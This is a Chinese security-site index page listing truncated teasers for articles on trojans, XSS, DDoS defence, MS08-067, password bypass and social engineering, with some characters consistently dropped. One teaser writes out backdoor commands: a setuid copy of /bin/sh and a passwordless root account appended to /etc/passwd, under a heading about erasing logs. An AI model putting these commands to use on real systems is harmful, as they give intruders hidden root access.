byshell: 5个步骤帮你清除内核级木马程序Byshell
来源:赛迪网 Byshell是个无进程、无DLL、无启动项、集多种Rootkit技术特征独立功能远程控制后门(Backdoor)其利用线程注射DLL到系统进程解除DLL映射并删除自身文件和启动项关机时恢复它是内核级木马主要部分工作在Ring0因此有很强隐蔽性和杀伤力 黑客通常用Byshell木马远程控制安装了Windows NT/2000/XP/2003操作系统机器当Byshell被安装在台远程... [阅读全文]
警惕2009新年第一高危木马 母马下载器
来源:赛迪网2009新年刚到网络安全形势就异常严峻款名为“母马下载器”恶性木马凭借其超强“穿透还原”、“超快更新变异”、“反杀”能力几乎摆脱了所有主流安全软件Software剿杀正在大面积侵袭网民电脑为此360安全中心紧急推出了最新“360顽固木马专杀大全”可以将该恶性“母马”举根除建议广大网民尽快下载使用 据360安全专家石晓虹博士介绍近周来“母马下载器”以日均超过100万查杀量持续高居360安... [阅读全文]
实战:化繁为简 搭建内网临时DHCP服务
来源:IT时报 =a14c id=zoom 对于中小企业来说DHCP服务恐怕是最为常见网络服务的了很多企业网络管理员都是通过专门windows server操作系统里面DHCP组件功能来建立对应服务然而你是否遇到过需要临时开启DHCP服务情况呢?如果依然按照传统意义上DHCP服务开启思路方法话需要安装windows server操作系统还要设置发布区域等等非常不方便那么有没有什么办法能够帮助我们化... [阅读全文]
入侵检测系统的现状:无线局域网入侵检测现状和要点分析
来源:网管员世界=a14c id=zoom 随着无线技术和网络技术发展无线网络正成为市场热点其中无线局域网(WLAN)正广泛应用于大学校园、各类展览会、公司内部乃至家用网络等场合但是由于无线网络特殊性攻击者无须物理连线就可以对其进行攻击使 WLAN安全问题显得尤为突出对于大部分公司来说WLAN通常置于防火墙后黑客旦攻破防火墙就能以此为跳板攻击其他内部网络使防火墙形同虚设和此同时由于WLAN国家标准... [阅读全文]
quot什么意思:DNS爆漏洞黑客能控制网络 或致" 钓鱼" 攻击
来源:赛迪网2008年7月9日消息计算机行业巨头正在忙于修复互联网基础中个安全漏洞这个安全漏洞能够让黑客控制互联网通信 主要软件Software和硬件厂商几个月来直在秘密研制本周 2发布这个软件Software“补丁”以修复这个漏洞这个安全漏洞存在于计算机被路由到网页地址方式中 Securosis公司分析师Rich Mogul在媒体电话会议上说这是整个互联网地址解析方案工作方式个非常基本问题你拥有... [阅读全文]
专家支招:构建安全服务器环境 阻止黑客攻击
来源:51CTO.com “网站WebSite黑客”、“奥运黑客”似乎最近成为了互联网安全方面个热话题从Google上搜索“奥运黑客”词竟达646,000多项可见所受关注度的高而普通网站WebSite也在最近频频传出被黑客攻击消息据有关数据显示:今年1到5月,全国有3万多个网站WebSite遭到“黑客”入侵!由于缺乏专业防护能力中小型政府网站WebSite、企业网站WebSite已成为 “黑客”... [阅读全文]
安全技术讲解:配置IIS蜜罐抵御黑客攻击
来源:51CTO.com 据有关资料显示现在有大量498)this.style.width=498;" border=0 图4 保存所有更改然后退出Internet 信息服务这样来当个恶意用户通过IP地址来访问网站WebSite时他就会被发送至空目录并得到个403而通过DNS域名来访问网站WebSite用户由于有了主机头信息就能够访问网站WebSite内容这样做并不是绝对安全黑客们仍会试图通... [阅读全文]
utorrentweb:利用基于Web的黑客技术造攻击uTorrent客户端
来源:51CTO.com uTorrent是款优秀BT下载客户端软件Software它具有个头小巧界面清爽下载速度快等诸多优点所以广受喜欢用BT下载用户欢迎但是我想要说是亲爱uTorrent用户们小心了498)this.style.width=498;" border=0 图4 uTorrent客户端中跨站脚本漏洞 需要注意“localhost”部... [阅读全文]
黑客入侵:解密黑客入侵思路方法 保卫电子邮件的安全
来源: 赛迪网 在不断公布漏洞通报中邮件系统漏洞该算最普遍项黑客常常利用电子邮件系统漏洞结合简单工具就能达到攻击目 电子邮件究竟有哪些潜在风险?黑客在邮件上到底都做了哪些手脚? 同走进黑客全程攻击了解电子邮件正在面临威胁和挑战…… 电子邮件持续升温使的成为那些企图进行破坏人所日益关注目标如今黑客和病毒撰写者不断开发新和有创造性思路方法以期战胜安全系统中改进措施出自邮件系统漏洞 典型互联网通信协议—... [阅读全文]
跨站脚本:利用跨站脚本攻击Eclipse本地Web服务器
来源:51CTO.com Eclipse是个开放源代码、基于 Java 可扩展开发平台目前该平台在世界范围内得到了广泛应用本文将介绍对于Eclipse本地Web服务器个跨站脚本漏洞利用思路方法更重要是我们将学习种处理有效荷载中空格符高级窍门技巧、Eclipse介绍Eclipse 是个开放源代码、基于 Java 可扩展开发平台就其本身而言它只是个框架和组服务用于通过插件组件构建开发环境幸运是Ecli... [阅读全文]
如何防范ddos攻击:DDOS攻击!如何有效屏蔽?
来源:21世纪安全网络 随着Internet互联网络带宽增加和多种DDOS黑客工具不断发布DDOS拒绝服务攻击实施越来越容易DDOS攻击事件正在成上升趋势 近日据业内人士反映近日上海地区众多网站WebSite或机房均遭到了Ddos攻击其中某站长论坛在10中多次遭到攻击最终导致整个网站WebSite瘫痪另有其他企业网站WebSite在遭到攻击同事牵连到了同服务器或同机柜其他用户使得众多“无故群众”也... [阅读全文]
u盘windowsxp系统:用U盘就可进入有密码的Windows系统
来源:安全中国U盘 如今可以说非常普及了不过如果只是把它用来存储数据话也许有点可惜了其实我们还可以让U盘发挥更大能量!今天小编教你招能让你U盘代 替登录系统密码只有当你插上U盘才能正常进入系统操作否则任何操作都无法进入系统如何样是不是很有兴趣试? 要想成功实现上述功能我们需要借助名为Disklogon小工具它是个功 能强大安全设置工具可让我们使用优盘、软盘等移动设备来登录系统可在登录时免于输入用户... [阅读全文]
Linux各版本的本地root密码破解思路方法
来源:网络这段时间老碰到有人问及各个linux版本本地root密码破解思路方法我这里自己以及在网络上搜集了些资料希望对看到了这文章而又恰好用得到技术人员有点帮助: ()RedHat/CentOS/Fedora 系统密码破解 1.在grub选项菜单按E进入编辑模式 2.编辑kernel 那行最后加上S (或者Single) 3.按B启动到single-user mode 4.进入后执行下列... [阅读全文]
ping批处理:批处理文件判断哪些IP地址Ping不通
此文章主要针对内网来说事这个批处理文件针对是某网段循环ping而得出来结果分析哪些IP地址Ping不通以便让网管查询没有被占用IP地址 打开记事本在窗口中输入如下命令: @Echo off date /t IPList.txt time /t IPList.txt echo = IPList.txt For /L %%f in (1,1,100) Do Ping.exe -n 2... [阅读全文]
u盘autorun.inf:对Autorun.inf类U盘病毒的攻防经验整理总结
“RavMonE.exe"、"rose.exe"、"sxs.exe"、"copy.exe"、"up.exe"...根目录下神秘幽灵系统安全杀手它们被称作“U盘病毒”无数Windows用户都在为它们而焦头烂额这篇文章是篇对自己对U盘病毒研究和和U盘病毒斗争经验教训整理总结 Windows 95以后系统都有个“自动运行”功能通过在卷插入时读取磁盘卷上Autorun.inf文件来获得Explore... [阅读全文]
壳上加壳:纵横间谁能相抗 论常见的壳和加壳技术
在这外壳风起云涌几年间出现了无数优秀外壳CoDe_inJect 曾谈过对几种流行壳看法我斗胆结合他言论描述下现在常见保护外壳: ASProtect 无可争议外壳界老大它开创了壳新时代SEH 和各种流行反跟踪技术、多态变形引擎使用(准确来说是从病毒中借用)、BPM 断点清除等都出自于此;更为有名当属 RSA 算法使用使得 DEMO 版无法被破解成完整版;Code Dips也源于这里;输入表处理即使... [阅读全文]
arp入侵攻击:入侵和攻击的概念
“入侵”是个广义上概念所谓入侵是指任何威胁和破坏系统资源行为例如非授权访问或越权访问系统资源、搭线窃听网络信息等均属入侵实施入侵行为“人”称为入侵者而攻击是入侵者进行入侵所采取技术手段和思路方法入侵整个过程(包括入侵准备、进攻、侵入)都伴随着攻击有时也把入侵者称为攻击者 入侵者可能是具有系统访问权限授权用户也可能是非授权用户或者是它们冒充者入侵者入侵途径有 3种是物理途径——入侵者利用管理缺陷或人... [阅读全文]
rundll32.exe:Webshell中利用Rundll32执行Exe
摘要:个web shell系统权限设置得很好常用exe都无权执行可写目录传上去exe文件也没有执行权限最终发现设置权限时候漏掉了rundll32.exe如是就写了这个个代码 测试开始时候PHP似乎没权执行命令本来打算用php本身些溢出问题溢出个低权限shell来后来意外发现使用proc_open可以执行些内部命令只是外部命令和目录都做了比较严格权限设置而已于是就测试可能可以利用外部命令最终测试到了... [阅读全文]
社会工程学:信息的隐藏价值-社会工程学
来源:网络社会工程师十分重视企业中许多表面上看去无利害关系信息这些信息是他能否披上可信外衣至关重要原因 金融行业个漏洞 信誉支票(CREDITCHEX) 曾经有段很长时期英国银行系统十分闭塞大街上位诚实普通市民并不能随便走进银行而直接申请个银行帐户银行不会把他当做客户除非他带有某位正式银行客户推荐信 当然这和如今表面上人人平等银行机构大不样如今办理银行业务没什么地方比友善、平等美国更方便了任何人都... [阅读全文]
几款 加密 软件Software的破解思路方法
来源:安全中国现在网络上流行很多文件夹加密和文件加密所谓加密软件Software很多都是个人根据开源代码编写多数都是利用windows窍门技巧实现(最常见就是将文件隐藏到回收站万你不小心删除了回收站或者重装了系统那就只有哭了)最受不了就是他们还都号称自己是什么“无敌”加密下面就告诉大家几款加密软件Software破解思路方法非常简单你可以用这个办法去破解使用这类软件Software电脑说不定有意外... [阅读全文]
系统后门:系统后门手法和日志的擦除
好不容易搞了太服务器很不容易如果被发现了就没了!可惜啊! 其实开后门思路方法有很多种 1. uid #cp /bin/sh /tmp/.sh #chmod u+s /tmp/.sh 加上 suid 位到shell上虽然很简单但容易被发现 2. echo "hack::0:0::/:/bin/csh" /etc/passwd 即给系统增加个 id 为 0(root)帐号无口令 但管理员很快... [阅读全文]
ms08067漏洞:MS08-067漏洞的触发条件
来源:互联网通常在溢出成功后目标主机监听端口为4444其对应PID为840(随机)毫无疑问它应该和某个系统服务相对应输入tasklist /svc后发现其对于进程是svchost.exe该进程在系统中有多个但PID为840这个svchost.exe进程是个宿主进程其中包含了诸如lanmanserver, lanmanworkstation, Netman等多个系统服务 那到底是哪个系统服务触发了... [阅读全文]
ms08067:Ms08-067 Exp 详细测试流程
Writed By 樱木花盗Blog:www.03389.com500){this.resized=true;this.style.width=500;}"测试到此结束以下有关此次测试大家可能遇到几个问题我在这里集中回答下Q:我 服务 里没有 Server 这个服务如何办?A:在 本地连接-属性 里 点 安装-服务-添加-Microsoft 网络文件和打印机共享 点确定会提示是否重启其实不用重启就... [阅读全文]
破解密码相关心理学知识
很多黑客入门是从破解口令开始!而是解密口令变成了由为重要门毕修课今天我想谈不是如何去破解口令而是篇有关口令心理学文章!如果下述些列子正好和你口令设置大同小异那么请你马上改了它你口令被破解可能性很大很大! 首先要介绍说明是许多root由于才用来口令保护思路方法当他口令设置完的后检测会自动提示口另不安全性直到ROOT改成了没有规则口令所以对这些口令用口令心理学来分析是白费工夫了!我们主要针是对些普通... [阅读全文]
堆栈溢出:堆栈溢出的攻和防
溢出是网络安全中经常接触到个问题旦出现某种溢出漏洞网络上成千上万电脑都将成为Hacker兄弟姐妹们砧板上肉了那么溢出到底是什么?这种攻击方式需要如何利用和防范?慢慢往下看就知道了 溢出就是对用户提交数据不作任何检查或者检查不完全而导致/内存在学习它的前读者朋友们定要理解虚拟内存概念这里我对这些东西不作介绍了想知道朋友可以去看看其他书籍 我们先来看看堆栈溢出是如何样看看下面: void liz... [阅读全文]
路由器的设置:路由器的利用和渗透
小生不材今天给大家讨论下路由器利用和渗透大家都知道路由器是还要告诉大家如果输入show arp的后它会有个缓存Cache那么我们下次查询时候最好要清除下缓存Cache可以输入clear arp-cache 下面来说下第3个利用: 就是路由器是个非常不错telnet 跳板我们在进入特权模式下后可以在路由器里面再建立telnet 比如:Router#telnet 127.0.0.1 ... [阅读全文]
processexplorer:进程管理好帮手Process Explorer
软件Software小档案 软件Software名称:Process Explorer 软件Software大小:267KB 软件Software语言:英文 运行环境:NT/2000/XP 汉化下载:http://www.3800hk.com/Soft/zhly/24680.html(推荐) 对于系统进程大家往往都感到陌生而且不敢轻举妄动事实上只要我们对系统进程有所了解那么你就不会再有... [阅读全文]
网络攻防:网络攻防第 3章
littlefishQQ 355822286BLOG www.crhack.cn 暴库 前言 暴库就是通过些技术手段或者漏洞得到数据库地址并将数据非法下载到本地黑客非常乐意于这种工作为什么呢?黑客在得到网站WebSite数据库后就能得到网站WebSite管理账叼对网站WebSite进行破坏和管理黑客也能通过数据库得到网站WebSite用户隐私信息甚至得到服务器最高权限 曾经案例 黑客... [阅读全文]
网络攻防:网络攻防第 2章
littlefishQQ 355822286BLOG www.crhack.cn 前言 随着互联网业迅速发展许多企业或者个人都已经拥有了自己网站WebSite随的安全隐患也就随的而来在这章就给大家讲讲WEB服务上传漏洞 第节、 寻找上传漏洞 随着WEB出现和发展很多员都已经跟着原始潮流这里可能成了规矩似 后台或者是管理总是admin 用户永远都是user 这些好像都已经成了定律那么上传也就是... [阅读全文]
